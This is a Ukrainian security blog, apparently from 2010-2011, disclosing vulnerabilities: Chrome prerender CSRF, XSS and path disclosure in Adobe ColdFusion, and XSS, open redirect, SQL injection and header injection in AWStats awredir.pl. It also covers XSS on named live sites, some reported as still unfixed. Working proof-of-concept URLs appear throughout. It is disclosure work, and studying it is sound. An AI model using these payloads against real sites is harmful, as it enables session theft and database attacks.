Websecurity - Веб безпека

В березні в записі Вбудований CSRF в Mozilla та Firefox я писав про проведення CSRF атак через префетчінг - функцію попереднього завантаження сторінок. Що наявна в браузерах від Mozilla (всіх браузерах на движку Gecko).

І в Google Chrome 13, як в dev і beta, так і фінальній версії, що вийшла минулого місяця, додали підтримку префетчінгу. Цю функцію Гугл ще називає пререндіренгом та Instant Pages. Тому з недавніх пір не тільки браузери Mozilla та Firefox, але й Chrome вразливі до CSRF атак через префетчінг.

По замовчуванню в Chrome опція префетчінга увімкнена. Що дозволяє проводити дану атаку на всіх користувачів Google Chrome 13 та наступних версій.

На даний момент підтримується один з трьох (реалізованих Мозілою) варіантів префетчінгу (і відповідно варіантів атаки):

<link rel=”prerender” href=”http://site/script_to_attack”>

Тільки замість “prefetch”, використовується “prerender”. Варіанти префетчінгу (і атаки) через meta-тег і HTTP заголовок Link будуть додані пізніше.

Враховуючи, що Гугл розширив концепцію префетчінга в своїй функції пререндерінга, то і атака може бути більш небезпечною. Якщо у префетчінгу відбувався лише один запит до одної сторінки (і лише вона викачувалася), то у пререндеренгу викачується як сама сторінка, так і всі ресурси, на які вона посилається (тобто відбувається багато запитів з одного лише link-тега). Що може використовуватися як з метою DoS-атак одночасно на велике число ресурсів (зі сторінки, на яку вказує link-тег), так і для проведення багатьох CSRF-атак (на один або багато різних сайтів).

Для захисту від даної атаки потрібно відключити префетчінг в браузері. Для цього в налаштуваннях (Settings) потрібно відключити опцію “Predict network actions to improve page load performance”. В цьому відношенні Гугл зробив краще ніж Мозіла, бо залишив дану опцію в налаштуваннях (тому що Мозіла робила так в старих браузерах, а починаючи з Firefox приховала дану опцію і потрібно її змінювати спеціальних просунутим методом, що я описав в вищезгаданому записі).

Атака працює в Google Chrome 13.0. А також (при використанні rel=”prefetch”), як я писав раніше, в Mozilla та Firefox (та інших браузерах на движку Gecko, що має функцію префетчінга).

25.06.2011

У червні, 18.06.2011, я знайшов Cross-Site Scripting та Full path disclosure уразливості в Adobe ColdFusion. Які я виявив на багатьох сайтах, що використовують ColdFusion. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в Adobe ColdFusion.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

23.09.2011

XSS:

http://site/CFIDE/componentutils/componentdetail.cfm?component=%3Cbody%20onload=alert(document.cookie)%3E
http://site/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=%3Cbody%20onload=alert(document.cookie)%3E
http://site/CFIDE/componentutils/cfcexplorer.cfc?method=%3Cbody%20onload=alert(document.cookie)%3E

http://site/CFIDE/componentutils/cfcexplorer.cfc (XSS через заголовок User-Agent)

http://site/CFIDE/probe.cfm (XSS через заголовок User-Agent)

http://site/CFIDE/Application.cfm (XSS через заголовок User-Agent)

http://site/CFIDE/componentutils/Application.cfm (XSS через заголовок User-Agent)

http://site/CFIDE/componentutils/_component_cfcToHTML.cfm (XSS через заголовок User-Agent)

http://site/CFIDE/componentutils/_component_cfcToMCDL.cfm (XSS через заголовок User-Agent)

Full path disclosure:

http://site/CFIDE/probe.cfm
http://site/CFIDE/componentutils/componentdetail.cfm?component=CFIDE.adminapi.base
http://site/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=WEB-INF.cftags.component
http://site/CFIDE/componentutils/cfcexplorer.cfc?method=1
http://site/CFIDE/componentutils/_component_cfcToHTML.cfm
http://site/CFIDE/componentutils/_component_cfcToMCDL.cfm

Через componentdetail.cfm та cfcexplorer.cfc можна отримати FPD навіть при відключених дебаг повідомленнях на сервері.

Уразливі Adobe ColdFusion 7 та попередні версії до XSS, і Adobe ColdFusion 9 та попередні версії до FPD.

В даній добірці уразливості в веб додатках:

• CA Total Defense Suite UNC Management Console DeleteFilter SQL Injection Vulnerability (деталі)
• Apache Archiva cross-site scripting vulnerability (деталі)
• CA Total Defense Suite NonAssignedUserList Stored Procedure SQL Injection Vulnerability (деталі)
• Path disclosure in FlatnuX (деталі)
• CA Total Defense Suite UNC Management Console DeleteReportLayout SQL Injection Vulnerability (деталі)
• DoS (Denial of Service) Risk in FlatnuX (деталі)
• HP Virtual Server Environment for Windows, Remote Privilege Elevation (деталі)
• Path disclosure in Coppermine (деталі)
• Directory Traversal Vulnerability in Viola DVR VIO-4/1000 (деталі)
• “time” SQL Injection vulnerability in WSN Guest (деталі)

08.12.2010

У серпні, 13.08.2010, я знайшов Cross-Site Scripting уразливість на популярному проекті http://www.livejournal.com. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на livejournal.com.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

22.09.2011

XSS:

http://www.livejournal.com/update.bml?event=%3Cimg%20src='1'%20onerror=alert(document.cookie)%3E

XSS працювала в браузерах IE та Chrome.

Дана уразливість вже виправлена.

В даній добірці уразливості в веб додатках:

• HP Insight Control Performance Management for Windows, Remote Privilege Elevation, Cross Site Request Forgery (CSRF) (деталі)
• Multiple XSS vulnerabilities in Gollos (деталі)
• CA Total Defense Suite Heartbeat Web Service Remote Code Execution Vulnerability (деталі)
• Multiple XSS vulnerabilities in Wikipad (деталі)
• CA Total Defense Suite UnassignFunctionalUsers Stored Procedure SQL Injection Vulnerability (деталі)
• SQL Injection in Seo Panel (деталі)
• CA Total Defense Suite UNCWS Web Service getDBConfigSettings Credential Disclosure Vulnerability (деталі)
• SQL Injection in Seo Panel (деталі)
• CA Total Defense Suite UnassignAdminRoles Stored Procedure SQL Injection Vulnerability (деталі)
• SQL Injection in Seo Panel (деталі)

У вересні, 02.09.2011, я знайшов Cross-Site Scripting, Redirector, SQL Injection, HTTP Response Splitting та CRLF Injection уразливості в AWStats (в awredir). Про що я вже повідомив розробнику на минулому тижні (але він так і не виправив їх).

З AWStats постачається скрипт Advanced Web Redirector (awredir.pl), який має численні уразливості. В 2008 році trev та tx вже виявили в ньому XSS і Redirector уразливості.

Як я виявив, версія awredir 1.1 (build 1.5) була не вразлива до XSS, зато версія 1.1 (build 1.6) вже була вразлива.

В версії 1.1 та попередніх версіях скрипта є XSS, Redirector та SQL Injection уразливості. А в версії 1.2 додали захист - параметр key, що повинен бути рівний md5($KEYFORMD5.$UrlParam), де $KEYFORMD5 - це секретне слово, а $UrlParam - це параметр url. Який може і не використовуватися в скрипті (якщо $KEYFORMD5 пустий), а також його можна виявити підбором (знаючи робочу пару параметрів url та key). Параметр key буде необхідний для версії 1.2 скрипта для проведення Redirector, SQL Injection, HTTP Response Splitting і CRLF Injection атак.

В версії 1.2 виправили XSS, але Redirector і SQLi дірки залишилися та додали HTTPRS, CRLF Injection і дві нові XSS.

XSS (в версіях <=1.1):

http://site/awredir.pl?url=javascript:alert(document.cookie)

Redirector:

http://site/awredir.pl?url=http://websecurity.com.ua

В версії 1.2:

http://site/awredir.pl?key=0f3830803a70cc1636af3548b66ed978&url=http://websecurity.com.ua

SQL Injection:

http://site/awredir.pl?url=’%20and%20benchmark(10000,md5(now()))/*

В версії 1.2:

http://site/awredir.pl?key=f38ed1cdb04c8bda5386f7755a4e1d3e&url='%20and%20benchmark(10000,md5(now()))/*

SQL Injection атака можлива, якщо включений запис в БД ($TRACEBASE) та підключений DBI.

XSS (в версії 1.2):

http://site/awredir.pl?url=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/awredir.pl?key=%3Cscript%3Ealert(document.cookie)%3C/script%3E

HTTP Response Splitting:

http://site/awredir.pl?key=04ed5362e853c72ca275818a7c0c5857&url=%0AHeader:1

Що може використовуватися для включення хедерів, в тому числі для XSS і Redirection атак.

CRLF Injection:

http://site/awredir.pl?key=4b9faa91e2529400c4f3c70833b4e4a5&url=%0AText

CRLF Injection в логи можлива при включеному $DEBUG і/або $TRACEFILE.

Уразливі всі версії AWStats (6.0, 7.0 та попередні версії).

03.12.2010

У серпні, 09.08.2010, я знайшов Abuse of Functionality, Insufficient Anti-automation та Cross-Site Scripting уразливості на сайті http://websiteoptimization.com (зокрема на його піддомені http://analyze.websiteoptimization.com). Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше.

21.09.2011

Abuse of Functionality:

http://analyze.websiteoptimization.com/authenticate.php?url=http://www.google.com

Через даний функціонал можна проводити атаки на інші сайти. А також DoS атаку на сам сервіс. Про подібні уразливості я писав в статті Використання сайтів для атак на інші сайти.

Insufficient Anti-automation:

На даній сторінці використовується вразлива капча. Капчу можна обійти посилаючи одну і ту саму робочу пару значень параметрів session і captcha.

XSS:

• alert(document.cookie)
• цікавий
• html включення

Дані уразливості досі не виправлені.

26.11.2010

У серпні, 09.08.2010, я знайшов Cross-Site Scripting уразливість на сайті http://www.4post.com.ua (онлайн ЗМІ). Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на www.4post.com.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

20.09.2011

XSS:

• alert(document.cookie)

Адміни спробували виправити дану уразливість (при цьому мені не подякувавши, як за звичай роблять ламєра). Але зробили це некоректно і при невеликій зміні коду вона знову працює.

XSS (з MouseOverJacking):

• alert(document.cookie)
• цікавий

Дана уразливість досі не виправлена.

В даній добірці уразливості в веб додатках:

• McAfee Firewall Reporter GeneralUtilities.pm isValidClient Authentication Bypass Vulnerability (деталі)
• Multiple XSS vulnerabilities in Photopad (деталі)
• Novell ZENworks Asset Management Path Traversal File Overwrite Remote Code Execution Vulnerability (деталі)
• File Content Disclosure in Wikipad (деталі)
• Certain HP Photosmart Printers, Remote Unauthorized Access, Cross Site Scripting (XSS) (деталі)
• Information Disclosure in Arctic Fox CMS (деталі)
• IBM Tivoli Directory Server ibmslapd.exe SASL Bind Request Remote Code Execution Vulnerability (деталі)
• Path disclosure in ArtGK CMS (деталі)
• RSA, The Security Division of EMC, announces the release of Adaptive Authentication (On-Premise) Flash File Security Patch (деталі)
• XSS vulnerability in Gollos (деталі)

02.12.2010

У серпні, 09.08.2010, я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості на сайті http://www.htmlvalidator.com. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на online.htmlvalidator.com.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

19.09.2011

XSS:

https://www.htmlvalidator.com/htmlval/webemailform.php?s=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Insufficient Anti-automation:

https://www.htmlvalidator.com/htmlval/webemailform.php

Якщо XSS вже виправлена, то IAA досі так і не виправлена.